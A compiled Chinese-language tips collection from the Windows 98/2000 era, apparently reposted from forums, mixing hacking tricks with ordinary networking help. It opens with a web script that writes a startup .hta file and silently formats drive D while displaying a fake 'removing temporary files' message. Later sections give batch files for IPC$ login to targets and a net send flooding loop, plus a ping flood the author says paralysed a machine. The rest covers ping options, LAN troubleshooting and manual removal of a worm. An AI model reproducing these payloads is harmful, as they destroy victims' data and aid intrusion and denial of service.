D、格式化硬碟:(最恐怖的~~~慎用!!!請勿用於非法用途!!!使用後如果有任何負作用,後果自負!與傷寒天空『ColdCrySky』;亂刀留影無關!!!)

scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\啟動\\startup.htm";
scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();

說明:當您瀏覽了網頁,會把startup.hta文件寫入啟動檔案夾,並提示WINDOWS正在移除臨時文件!實際上是在格式化你的D碟,程式碼中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對應為:Windows Scripting Host Shell Object。程式碼中的:WSH全稱是:Windows Scripting Host,是微軟的一種關於32位系統平台與語言無關的教本解釋機制,它使得指令碼能在WINDOWS桌面或命令提示字元下執行~WSH所對應的程序WScript.exe是一個指令碼語言解釋器,位於WINDOWS所在資料夾下,所以它可以像執行批次處理文件一樣執行WSH指令碼程序~
解決方法:1)更新您的瀏覽器,使用最新的瀏覽器上網!
2)修改msdos.sys,在其中加入:Bootmentu=0指令行,目的是禁用啟動表單。
3)吧format.com改名
4)禁用WSH。具體方法:在win98中,從增加刪除程式中點擊WINDOWS安裝程序,開啟附件一項,將WINDOWS SCRIPTING HOST前面的選項去掉,就可以移除掉WSH了~~~win2000和xp的用戶可以在我的電腦-工具表單-資料夾選項-選項檔案類型,找到VBS VBSCRIPT FILE選項,點擊移除!


29)系統原有的的系統工具

其實無論大家從什麼地方,什麼方法找到一些好用的工具,都不如Windows原有的的工具用著方便(假設你區的地方正好不能上網,而你又沒有準備好這些工具,那怎麼辦?哈哈,不用著急,用好下面幾個Windows原有的的小工具,可以使你事半功倍!)

1、msinfo32.exe

位於C:\Program Files\Common Files
Microsoft Shared\Msinfo\msinfo32.exe,顯示電腦中的有關係統訊息,可用其診斷、解決電腦問題並檢視遠端系統所產生的系統報告。

2、drwatson.exe --這個工具給我特別的親密感覺:第一次使用這個工具是在看了LK007大哥給cool兄弟的回覆以後,我馬上試驗~果然很有意思!LK007不愧是大哥!現在想起來都佩服不已~~~

位於C: \Windows \drwatson.exe,當某個應用程式在執行程序中出現錯誤時,它就會將出現錯誤的程序以及出現錯誤的記憶體位址一一記錄下來,並儲存為Windows的Drwatson子目錄下的*.wlg記錄文件。

3、sfc.exe

位於C:\Windows\System\sfc.exe,用於自動搜尋被改變、移除或損壞了的系統檔案。

4、msconfig.exe

位於C:\Windows\System\msconfig.exe,通過修改啟動方式以及啟動時執行哪些應用程式等系統組態,從而達到快速排除故障的目的。

5、scanreg.exe

位於C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),用於檢查、修復、制作備份以及還原系統註冊表及相關組態文件的工具軟體,防止因註冊表資料被破壞而導致的系統故障。

6、vcmui.exe

位於C:\Windows\vcmui.exe,在後台自動將被覆蓋的驅動程式制作備份下來,當我們安裝的新驅動出現錯誤時可用它進行恢復。

7、winrep.exe

位於C:\Windows\winrep.exe,能自動收集有關係統訊息並提示用戶輸入故障所在,幫我們編寫一篇完整的「求援」報告,並將其傳送給有關技術維護人員,簡化「求援」操作。

這七個Windows原有的的小程序可以在開始選單--執行中直接輸入檔案名(無需輸入副檔名)彈出該程序!
31)批次處理在入侵中的幾則妙用!

A、簡化IPC$登入目標物的操作:

用記事本建立一個名字為:ipcruqin.bat的批次處理文件,內容如下:

@net use \\%1\ipc$ %3 /u:"%2"
@echo OK!已經成功建立連接

之後,大家在CMD下輸入:ipcruqin.bat 目標物IP 目標物的admin帳號/用戶的密碼。就可以登入上去了,而不需要那一大長串的指令了!

B、批次處理轟炸對方電腦:

開啟一記事本,在裡面輸入如下內容:

@echo 正在轟炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 傳送失敗

將其儲存為bat格式的文件即可,使用方法:*.bat(該批次處理文件的名字)+ 空格 + 目標IP + 空格 + 你要對他說得話!

這次先簡單介紹這三個!等下次有機會再給大家介紹更多的批次處理文件的用途!


32)再說幾個非常簡單實用的DOS指令(工具):

A、fport.exe --檢視那些連接阜都是那些程序使用的指令。

B、netstat -an --檢視那些連接阜於外部的IP連接。比如這裡顯示 :23 XX.XX.XX.XX 而你又沒有開23連接阜,那麼,哈哈……還用我說麼?

C、letmain.exe \\ip -admin -d --列出本地機的administrators組的用戶名檢視是否有異常。

D、pslist.exe --列出行程

E、pskill.exe --殺掉行程,有時候再工作管理器中無法終止程序,那就用這個工具來停止行程。

F、login.exe --列出當前有那些用戶登入再你的電腦上。


ping指令詳解

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主機,直到你按下Control-C。
此功能沒有什麼特別的技巧,不過可以配合其他參數使用,將在下面提到。

-a Resolve addresses to hostnames.
解析電腦NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
從上面就可以知道IP為192.168.1.21的電腦NetBios名為iceblood.yofor.com。

-n count Number of echo requests to send.
傳送count指定的Echo資料包數。
在預設值情況下,一般都只傳送四個資料包,通過這個指令可以自己定義傳送的個數,對衡量網路速度很有說明 ,比如我想測試傳送50個資料包的返回的平均時間為多少,最快時間為多少,最慢時間為多少就可以通過以下獲知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
從以上我就可以知道在給202.103.96.68傳送50個資料包的程序當中,返回了48個,其中有兩個由於未知原因丟失掉,這48個資料包當中返回速度最快為40ms,最慢為51ms,平均速度為46ms。


-l size Send buffer size.
定義echo資料包大小。
在預設值的情況下windows的ping傳送的資料包大小為32byt,我們也可以自己定義它的大小,但有一個大小的限制,就是最大只能傳送65500byt,也許有人會問為什麼要限制到65500byt,因為Windows系列的系統都有一個安全漏洞(也許還包括其他系統)就是當向對方一次傳送的資料包大於或等於65532時,對方就很有可能擋機,所以微軟公司為了解決這一安全漏洞於是限制了ping的資料包大小。雖然微軟公司已經做了此限制,但這個參數配合其他參數以後危害依然非常強大,比如我們就可以通過配合-t參數來實現一個帶有攻擊性的指令:(以下介紹帶有危險性,僅用於試驗,請勿輕易施於別人電腦上,否則後果自負)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
這樣它就會不停的向192.168.1.21電腦傳送大小為65500byt的資料包,如果你只有一台電腦也許沒有什麼效果,但如果有很多電腦那麼就可以使對方完全癱瘓,我曾經就做過這樣的試驗,當我同時使用10台以上電腦ping一台Win2000Pro系統的電腦時,不到5分鍾對方的網路就已經完全癱瘓,網路嚴重堵塞,HTTP和FTP服務完全停止,由此可見威力非同小可。


-f Set Don`t Fragment flag in packet.
在資料包中傳送「不要分段」標誌。
在一般你所傳送的資料包都會通過路由分段再傳送給對方,加上此參數以後路由就不會再分段處理。


-i TTL Time To Live.
指定TTL值在對方的系統裡停留的時間。
此參數同樣是說明 你檢查網路運轉情況的。


-v TOS Type Of Service.
將「服務檔案類型」字段設定為 tos 指定的值。

-r count Record route for count hops.
在「記錄路由」字段中記錄傳出和返回資料包的路由。
在一般情況下你傳送的資料包是通過一個個路由才到達對方的,但到底是經過了哪些路由呢?通過此參數就可以設定你想探測經過的路由的個數,不過限制在了9個,也就是說你只能跟蹤到9個路由,如果想探測更多,可以通過其他指令實現,我將在以後的文章中給大家講解。以下為示例:
C:\>ping -n 1 -r 9 202.96.105.101 (傳送一個資料包,最多記錄9個路由)

Pinging 202.96.105.101 with 32 bytes of data:

Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90

Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
從上面我就可以知道從我的電腦到202.96.105.101一共通過了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個路由。
-s count Timestamp for count hops.
指定 count 指定的躍點數的時間戳。
此參數和-r差不多,只是這個參數不記錄資料包返回所經過的路由,最多也只記錄4個。


-j host-list Loose source route along host-list.
利用 computer-list 指定的電腦列表路由資料包。連續電腦可以被中間網路閘道分隔(路由稀疏源)IP 允許的最大數量為 9。


-k host-list Strict source route along host-list.
利用 computer-list 指定的電腦列表路由資料包。連續電腦不能被中間網路閘道分隔(路由嚴格源)IP 允許的最大數量為 9。


-w timeout Timeout in milliseconds to wait for each reply.
指定超時間隔,服務機構為毫秒。
此參數沒有什麼其他技巧。

ping指令的其他技巧:在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統檔案類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,當然TTL的值在對方的主機裡是可以修改的,Windows系列的系統可以通過修改註冊表以下鍵值實現:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
  128---80
  64----40
  32----20
好了,ping指令也基本上完全講解完了,其中還有-j,-k參數我還沒有詳細說明,由於某些原因也包括我自己所收集的資料過少這裡也沒有向大家詳細介紹,請大家見諒,如果在看了這篇文章的朋友當中有知道得比我更多的,以及其他使用技巧的也希望您能告訴我,並在此先謝過。

 



區域網路套用問題專題解答 (Rayi々)

1、問:我訪問區域網路中的電腦時,為什麼常常被提示要輸入用戶名和密碼?

答:這主要是為了安全方面的考慮。而且當你重新啟動電腦時又要重新輸入用戶名和密碼,這一點確實讓人會覺得很麻煩。

你只要在需要進行文件共享的電腦上建立一個相同的用戶名,並且使用相同的密碼,然後區域網路中的電腦都利用這個用戶名和密碼登入,這樣在網路芳鄰中訪問對方電腦時就不需要輸入用戶名和密碼了。

2、問:上網瀏覽前在區域網路中應如何對IE進行設定?

答:在區域網路中使用代理伺服器上網瀏覽時,應對瀏覽器進行必要的設定。以IE為例,在瀏覽器中代理伺服器的設定方法為:用滑鼠右擊桌面上的IE圖示,在彈出的右鍵表單中選項「內容」指令。在開啟的「Internet 內容」對話視窗中選項「連接」項,然後點擊「區域網路設定」,在「區域網路(LAN)設定」對話視窗中選「使用代理伺服器」,並輸入代理伺服器的位址以及連接阜。

預設值對於HTTP、FTP瀏覽器都是使用相同的代理伺服器設定,如果對這些服務有不同的代理,你就需要進行其他的設定。

方法為:點擊「進階」按鈕,取消「對所有傳輸協定均使用相同的代理伺服器」,並分別在不同的服務中輸入各自的位址和連接阜,儲存以上設定後,IE就可以使用代理伺服器上網了。

3、問:在區域網路中應如何設定OutLook Express收發郵件?

答:在區域網路中OE等電子郵件收發軟體同樣可以通過代理伺服器上網,只是不能再使用原來的單機撥號上網設定。而且相對於其他軟體的代理伺服器設定,郵件軟體的伺服器設定要更為特殊一點,其代理伺服器的檔案類型必須是Socks4或Socks5的伺服器。假設所使用的代理伺服器的位址為:202.102.49.141,用戶的郵件位址為:jjxm@163.com。
那麼在OE中代理伺服器的設定方法為:開啟OE後,選項表單「工具→賬戶」。在「Internet賬戶」中選項「郵件」選擇項,然後在賬戶列表中選項需要設定的賬戶,點擊「內容」按鈕。在內容視窗中選項「伺服器」選擇項(圖1),在接收和傳送郵件伺服器位址中輸入代理伺服器的位址(如202.102.49.141),並按「用戶名#郵件真實的收信位址」的命名規則,在賬戶名中輸入 「jjxm#POP3.163.com」,按下「確定」儲存後即可在代理伺服器中收發郵件了。

4、問:在由三台電腦組成的區域網路中,我在其中一台電腦上用過Windows最佳化大師後,為什麼這台電腦就不能登入網路,並且還提示找不到撥號橋接器?

答:根據你說的情況,是沒有安裝「撥號網路」。解決方法是:在「控制台」的「增加/刪除程式」中,選項「Windows安裝程序」,在「元件」的「通訊」中選項「撥號網路」,然後將Windows安裝碟放入光碟進行安裝,重新啟動電腦後就可使用撥號網路了。

5、問:如何在區域網路中設定QQ、ICQ等即時通訊軟體?

答:在QQ的主視窗中點擊「QQ2000」的按鈕,在其主表單中選項「系統參數」,在參數視窗中選項「網路設定」選擇項。首先在「上網檔案類型」中選項「區域網路接入Internet」,再選「使用Socks5代理伺服器」,然後輸入伺服器的位址以及連接阜(圖2),如果代理伺服器中設定了用戶密碼,還需要輸入用戶名和密碼。輸入完畢後可以點擊「測試」按鈕來檢測其代理是否正常。最後按下「確定」即可在代理伺服器中使用QQ了。
類似地,在ICQ中選項「連接」中的「防火牆」,可以定義多個代理伺服器,如Socks4、Socks5、HTTPS等。你首先要確定並選項所使用的代理伺服器檔案類型,然後在「代理伺服器」部分輸入主機的位址、連接阜,如果代理伺服器設定了用戶密碼,還必須輸入用戶名和密碼。對於代理伺服器的檔案類型、位址、連接阜等,如果你不太清楚,可以詢問網路管理員。


6、問:我想用NetMeeting進行區域網路中的通話,應該如何設定?

答:如果你首次開啟NetMeeting,軟體會自動啟動組態嚮導。在組態嚮導視窗點擊「下一步」,然後輸入你的基本訊息(如姓名、E-mail等)。繼續按下「下一步」,進入伺服器組態視窗,NetMeeting允許啟動時登入到目標伺服器,這個功能是針對於普通上網用戶的,區域網路用戶並不需要該功能,因此你必須取消該選項。繼續按下「下一步」,選項網路速度,必須選項「區域網路」,然後提示是否建立建立捷逕,你可以根據需要進行選項。接下來進行音瀕調節測試後就完成了區域網路中對NetMeeting的設定。

7、問:我知道在區域網路內文件是可以共享的,但我想問的是,列印機和掃瞄儀應該如何共享?

答:先來說說列印機的共享方法。你可以先在區域網路內找一台電腦,並把列印機連線到這台電腦上,然後按照說明書為列印機安裝好驅動程式。在Windows系統工作管理欄上,點擊「開始→設定→控制台」,在「控制台」視窗中雙按「列印機」圖示,再用滑鼠右鍵按下列印機圖示,在彈出的右鍵表單上選項「共享」,然後在開啟的「列印機內容」視窗上選項「共享為」,並像共享文件那樣給被共享的列印機也起一個共享名,然後點擊「確定」即可。
關於掃瞄儀的共享設定,你首先要看一下你的掃瞄儀是否具有網路共享功能,是否配備了用於共享的驅動程式,也就是說只有部分掃瞄儀可以進行網路共享。另外不同型號掃瞄儀的共享設定差異很大,最好查閱一下掃瞄儀的說明書。
8、我用分機線上網,上網速度最大才48000bps,請問是何原因? 還有,將Modem放在主機箱側面,開機後(未開啟Modem電源),家裡的電話就處於忙音狀態,如何解決?

答:第一個問題跟你的分機電話線或線接頭品質有很大關係,另外,如果你的Modem的速度平常都能接近48000bps,你也不要太在意,應該重點先看下它的實際下載速度是否令你滿意。第二個問題,肯定和你主機的電源等配件的電磁輻射強和遮閉效果差有關,你如果不想對你的主機進行大換血的話,最好用物體在主機和Modem之間進行遮閉,或將Modem離你的主機遠點,這是最好的辦法。

9、我新購的網路卡在電腦上無法安裝,而在其他電腦上卻使用正常,這是怎麼回事?

答:如果在電腦中安裝好網路卡後,系統沒有提示找到新硬體,你可執行「增加新硬體嚮導」來讓系統搜尋新硬體。方法是按下「開始」,指向「設定」,按下「控制台」,然後再雙按「增加新硬體」。按照螢幕提示操作。你可選「讓Windows搜尋新硬體嗎?」,按下「是(推薦)」,然後再按下「下一步」,讓系統找到網路卡再安裝其驅動。
而如果出現以下任何現象,網路卡或者網路卡所在的插槽損壞:

1、「增加新硬體嚮導」檢測不到網路卡;

2、「增加新硬體嚮導」能夠檢測到網路卡,但無法正常工作。

為了確定到底是網路卡還是插槽的問題,可以檢查網路卡是否牢靠插入插槽之中。如果網路卡已牢靠插入插槽之中,請改插到其他插槽之中試試。如果問題仍未解決,則可能是網路卡損壞或與你的電腦不相容,可更換之。
10、我的電腦出現「網路芳鄰」中找不到其他連網電腦的故障,如何解決?

答:「網路芳鄰」是按工作組顯示電腦的。如果你的電腦沒有設定工作群組名稱,開啟「網路芳鄰」時就可能看不到其他電腦。按下「開始」,指向「設定」,按下「控制台」,雙按「網路」,然後再按下「標幟」選擇項。你區域網路中所有電腦「工作組」項中的名稱應為一樣,如有不同你可在此項中按鍵輸入相同的工作群組名稱,然後按下「確定」重新啟動電腦既可。
此外,如果「網路芳鄰」中不出現「整個網路」圖示,可能是在Windows中沒有安裝必要的網路元件。要與網路上的其他電腦連接,則必須安裝以下元件:Microsoft網路客戶、網路橋接器、至少一種網路傳輸協定(如IPX/SPX、TCP/IP等)。可開啟「網路」,檢查「組態」選擇項上的列表,確保已安裝了各種必要的網路元件。如有,你可重新安裝各種缺少的元件即可。

11、問:公司區域網路,只有一台機器通過貓接入網際網路,現想其他機器接入網際網路,請問如何實現?
答:這是一個比較典型的代理上網問題。你可以在帶貓的電腦上安裝代理上網軟體(如Sygate、Wingate、Winproxy)或直接使用Windows原有的的共享上網功能上網(Windows 98第二版以上才帶此功能)。建議使用Sygate,該軟體設定較簡單。先撥號上網,後安裝Sygate,完畢後,Sygate將檢測網際網路的連接狀態,並自動設定。在其他需要代理上網的電腦上,指定網路閘道和DNS的 IP位址,步驟為網路芳鄰→右鍵→內容→TCP/IP傳輸協定→內容→DNS,輸入當地ISP的IP位址→網路閘道,輸入代理伺服器的IP位址→確定→重新啟動。設定完畢後,其他各項應用軟體均無須設定。

12、問:區域網路通過路由器、使用ADSL方式上網,如何使各工作站快速的獲得可以上網的IP位址而不手動式去指定?

答:假如使用Windows 2000,可以直接使用Windows 2000原有的的dhcp功能,首先建立一個作用域,然後為這個作用域增加DNS的搜尋順序和路由器的IP位址,DNS搜尋順序為當地ISP的IP位址,路由器的IP位址即設定成當前區域網路的路由器IP位址,其他機器則不指定IP位址,如非使用Windows 2000,則可使用第三方的dhcp軟體,比如代理軟體sygate和wingate都帶有dhcp功能。

13、問:公司要組建區域網路,需要用到郵件伺服器和WWW伺服器,請問這兩種服務放到一台電腦裡還是分別用兩台電腦?都用什麼軟體?謝謝!

答:這兩種服務現在用的皆比較廣泛,可以只用一台電腦或用兩台都可以,當然具體根據貴服務機構的預算開支和流量來決定。假如流量不大的話,建議只使用一台機器即可。至於軟體方面,可以使用Windows 2000作伺服器平台,然後使用Imail或Easymail作為郵件服務軟體,www服務建議使用apache serve軟體,因為Windows 2000原有的的IIS存在許多漏洞,而且不安裝,在建立www伺服器後,需考慮支持的語言指令碼,現在用的比較廣的是ASP和PHP,當然,具體使用哪種語言,很簡單,看你自己精通哪方面就使用哪方面的,還有一點你沒提供到的,就是很有必要建立一個ftp服務,你可使用u-ftp軟體,這款軟體在安裝和使用方面都不難。

14、問:家裡原先有一台PII的電腦,最近又新增一台P4機器,作業系統都為Windows 98且已安裝網路卡,現在我想把他們聯起來共享資源,該怎麼辦?

答:你所提的實際上即現在套用的比較廣泛的對等網的連接。很簡單,因你已有網路卡,你需做的使是購買適合長度的超五類線和2個RJ45的水晶頭,再去借一把打線鉗。然後再根據標準做一對跳線,即一頭採用T568A標準(具體線的排列是:白綠、綠、白橙、藍、白藍、橙、白棕、棕),另一頭採用T568B標準(白橙、橙、白綠、藍、白藍、綠、白棕、棕)。然後在作業系統中增加TCP/IP傳輸協定和Netbuei傳輸協定,把工作組設定為workgroup,電腦不能相同。

15、問:辦公室機器桌面的「網路芳鄰」圖示沒了,能上Internet,但無法瀏覽其他電腦上的資源了,怎麼辦?

答:說明你的Internet內容完好,但網路芳鄰內容中的「Microsoft 網路用戶」這一客戶元件沒了。
進到「控制台」中雙按「網路」,先在彈出的網路對話視窗中點按「增加」按鈕,再從隨後彈出的「請選項網路元件檔案類型」對話視窗中雙按「客戶」,最後從隨後的「選項網路客戶端機」對話視窗的左側選項「Microsoft」後再選項「Microsoft 網路用戶」,「確定」再「確定」並據提示重新啟動電腦就ok啦!先回去解決這個問題吧你……

16、問:辦公室機器桌面的網路芳鄰圖示解決了且也能瀏覽其他機器的共享資源了,但發現右鍵中的「共享」指令沒了!怎麼辦?

答:這是因為還缺少個「Microsoft網路上的文件與列印機共享」這一網路服務傳輸協定呢!
先右擊桌面「網路芳鄰」選「內容」,對話視窗中點按「增加」按鈕,再從隨後彈出的「請選項要安裝的網路元件」對話視窗中雙按「服務」,最後從隨後的「選項網路服務」對話視窗中選項「Microsoft網路上的文件與列印機共享」,「確定」再「確定」並據提示重新啟動電腦就ok啦!

17、問:右鍵中的「共享」指令已經顯身!但我設了共享不想讓別人從網路芳鄰中看到這個共享目錄,只有自己知道且能實現異地機上有完全操作的權限。

答:找到你想要共享的資料夾並右鍵點選「共享…」----這裡我就以共享「D:\Windows 98」為例,先選「共享為」後在共享名「Windows 98(當然也可改名共享哦)」後加一英文狀態的「$」符,再選「完全」並輸入設定好「密碼」,然後「確定」一次密碼就OK了。
這樣一來,絕對保證別人從網路芳鄰中看不到這個共享目錄的!那~~自己想從異地機上進入並實現完全操作時怎麼辦呢?哈哈,這麼辦:從異地機的位址欄中按鍵輸入「\\(機器名)\$(你的共享目錄名)」並「ENTER」,再輸入密碼並確定後,就進入啦!這樣你可靜悄悄地實現異地機上在自己設定的共享目錄內進行完全操作啦!不過注意其中「\」不能誤輸入成「/」哦!……好了,你會了嗎?

18、問:一塊PCI總線的10/100自適應網路卡,無法正常工作。主要表現在網路時斷時續,不管是不是Ping自己的IP位址,還是Ping對方的IP位址,都有這種情況發生。檢視網路卡的指示燈也出現同樣的現象。
答:首先你可檢查Hub的連接頭是不是出了故障,將該網路卡接到其他連接阜上,如果問題依然如故,說明Hub沒有問題。然後你可用網路卡隨盤附帶的測試程序盤檢視網路卡的有關參數,其IRQ值為5,再回到Windows 95/98作業系統,檢視作業系統分配給網路卡的參數值,其IRQ同樣應是5。此外,可檢查安裝該網路卡的主機板插槽是否有故障,你可開啟機箱,將網路卡換個PCI插槽試試。此外,你還可檢查CMOS參數設定,重新啟動電腦,進入CMOS狀態,選項「PNP/PCI Configuration」一項,如果IRQ5後面的狀態為「Legacy ISA」(保留的ISA總線設備),就應當將IRQ5後面的狀態改為「PCI/ISA PNP」。

19、問:我的電腦與一個對等網連接好了,但不能讀別人電腦上的資料,這是怎麼回事?

答:可能是你沒有設定好資源共享:選項「網路→組態→文件及列印共享」,將兩個選項全部打勾並確定,安裝成功的標誌是組態中出現了「Microsoft網路上的文件與列印機共享」選項,注意,還要檢查它與NetBEUI傳輸協定是否進行了綁定。選項「組態」中的NetBEUI傳輸協定,點擊「內容」按鈕,看綁定中「Microsoft網路上的文件與列印機共享」、「Microsoft網路用戶」前是否已經有對勾了。還要在「網路→標幟」裡將「電腦名稱」設定好,確定之後系統將重新啟動。

20、問:我的網路從集線器昇級為交換機後,感覺速度並沒有多大提高,是什麼原因?

答:這種情況需要從以下幾個方面來分析:
1、首先應驗證網路是否工作在100M狀態,具體做法是:驗證網線是五類以上線,網線做法遵循100M標準,網路卡支持100M工作狀態,只有滿足以上條件,交換機才能工作於100M狀態,從而最大限度地體現交換機的效能優勢。
2、如果網路在昇級前工作正常,資料交換量不是很大,資料衝突和廣播風暴現象出現的不是很頻繁,那麼昇級後網路效能的提升可能不是很明顯,這是正常現象。
3、還有一種情況是因為網路結構設定不當引起的,例如,如果把集線器放在第一級連接伺服器,而把交換機放在下一級來連接工作站,這樣資料交換仍然通過集線器進行,交換機的效能優勢沒有體現出來。所以,在組網時應當充分考慮網路結構的合理性,應將效能較好的設備置於整個網路的最進階。

21、問:VLAN是什麼意思,使用它有什麼好處?

答:VLAN是Virtual Local Area Network的縮寫,即虛擬區域網路的意思。VLAN的劃分有三種方式:關於連接阜(Port)、關於MAC位址和關於IP位址。通過劃分VLAN,可以把資料交換限制在各個虛擬網的範圍內,從而減少整個網路範圍內廣播包的傳輸,提高了網路的傳輸效率;同時各虛擬網之間不能直接進行通訊,而必須通過路由器轉發,起到了隔離連接阜的作用,為進階安全控制提供了可能,增強了網路的安全性。VLAN功能的適用性很廣,在資料交換較頻繁或對網路安全性有要求的環境均可適用,如:1、在智能小區、校園、企業等套用環境,使用VLAN功能可使不同VLAN間的機器不能互相訪問,可為網路安全控制提供良好保障;2、在遊戲廳、大中型企業等環境,使用VLAN可大大減少網路中不必要的資料交換的數量,杜絕廣播風暴,提升網路傳輸效能。

22、問:我的自適應網路卡只有紅燈閃爍,綠燈不亮,這種情況正常嗎?

答:首先你應該瞭解一般自適應網路卡紅燈和綠燈分別代表什麼含義——紅燈代表Link/Act(連通/工作),即連通時紅燈長亮,傳輸資料時閃爍;綠燈代表FDX(全雙工),即全雙工狀態時亮,半雙工狀態時滅。如果一個半雙工的網路設備(如Hub)和自適應網路卡相連,由於這張網路卡是自適應網路卡,它也會工作在半雙工狀態,所以綠燈不亮也屬於正常情況。

23、問:如何使用交換機的UpLink連接阜,怎樣連接?使用了UpLink口後,是否還可以使用其相鄰最近的連接阜?

答:UpLink口是交換機上一般的一種連接阜,它是為了便於兩台交換機之間進行級聯的連接阜。它與其相鄰的普通UTP口使用的是同一通道,因而,如果使用了UpLink口,另一個與之相鄰的普通連接阜就不能再使用了。這兩個連接阜稱為共享連接阜,不能同時使用。級聯的時候,你可使用一般的網線(網線的兩端都遵循同一標準,即同是EIA/TIA 568A或568B)將一個交換機的普通連接阜和另一個交換機的UpLink口連起來。如兩個設備都使用UpLink口連接,網線需要一端使用EIA/TIA 568A的標準,另一端使用EIA/TIA 568B的標準(如下表)。

標準568a 標準568b
橙白1 綠白1
橙2 綠2
綠白 3 橙白3
藍4 藍4
藍白5 藍白5
綠6 橙6
棕白7 棕白7
棕8 棕8


24、問:我在安裝網路卡後,在「系統→裝置管理員」中網路卡出現黃色的「!」號,請問該如何解決?

答:網路卡較容易與其他設備發生資源衝突,尤其是在系統中安裝有多個插卡的情況下,解決辦法是:
1、更換網路卡在主機板插槽上的位置是最好的解決辦法。
2、在該網路卡「內容」視窗「資源」標籤中找到「資源檔案類型」列表,選定發生衝突的「資源」,按「更改設定」按鈕,更改發生衝突的IRQ中斷號或者I/O位址。
3、有些PCI網路卡會強行佔用IRQ10,與一些強行佔用IRQ10的顯示卡發生IRQ中斷衝突,如果遇到這種情況,可在BIOS中將「Assign IRQ For VGA」項設定為Disabled,不給顯示卡分配固定的中斷。
4、執行網路卡附帶的軟碟中的設定程序,將網路卡設定為非PNP模式,設定IRQ中斷號和I/O位址為系統未佔用的位址;並在BIOS中將相應中斷號由PCI/ISA改為Legacy ISA。
如果使用上述方法均不能解決故障,建議換一塊網路卡試試。

25.問:ADSL上網網頁打不開的問題?
答:是MTU的問題!改一下註冊表!
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\0000\主鍵下面建立字元串鍵名為MaxMTU,鍵值為1450
查殺I-Worm.Wukill病毒(注意有變種了)的手動式方法 (微笑)

我是用手動式殺的。金山毒霸好像還不行,跟本就不報警。

首先用行程系統管理工具(如「最佳化大師」帶的行程系統管理工具)把可疑的行程殺掉,再搜尋最大不超過87KB的「*.EXE」文件,瑞星上說的自啟動「MSTRAY.EXE」文件不對,它好像有了新的變種,自啟動的檔案名可以變換,而且有時每次重新啟動動都會變,也不一定在WINDOWS哪個目錄下,所以要查整個不超過87KB大小的.EXE文件,然後將所有圖示為資料夾樣式的.EXE文件刪掉。同時對照註冊表裡的RUN項,搜尋不正常的啟動項(建議也用最佳化大師,這樣好判別,毒霸的也可以),除刪掉啟動項外,還要再搜尋一次不正常啟動項對應的程序,並刪掉。注意:這步操作十分危險,建議由有經驗的人員操作。
接著再分別搜尋comment.htt 和desktop.ini,把它們都刪掉。注意不要把「*:\My Documents」下的這兩個文件刪了,一般這裡的都是正常文件(我自己用的笨辦法就是用記事本開啟,看看裡面是不是MICROSOFT的東東)。
最後重新啟動就OK了。
瑞星的在2月份就可以殺了,毒霸好像到現在都不行,是它的破壞力太小所以毒霸不屑一顧?????!!!!!!!!


剛又看了看前人的貼,發現這個傢伙變種變的還是蠻快的。其中最大的變化就是自啟動項的變化,這個病毒我遇到的最厲害的是在記憶體中同時有不同檔案名的3個行程,並且自啟動項的名稱也不斷變化,但WINFILE.EXE這個文件始終存在,而且一般是在根目錄下,並陪隨comment.htt 和desktop.ini這兩個文件,可能這可以算為標誌性文件之一了。在其它的目錄下,則會根據你實際存在的目錄名而更換自己的名稱(哈,哈,這一點我比較佩服),不過無論它怎麼換名,文件大小大都是約在85KB左右(具體字元我沒有記錄)。

建議懷疑自己中毒時,把「隱藏已知檔案類型的副檔名」這個選項去掉,如果有資料夾圖示的.EXE文件,那麼恭喜你---------------中毒了!!!!!


另:正常的WINFILE.EXE文件大小為151419字元,且圖示為一個文件櫃樣式。

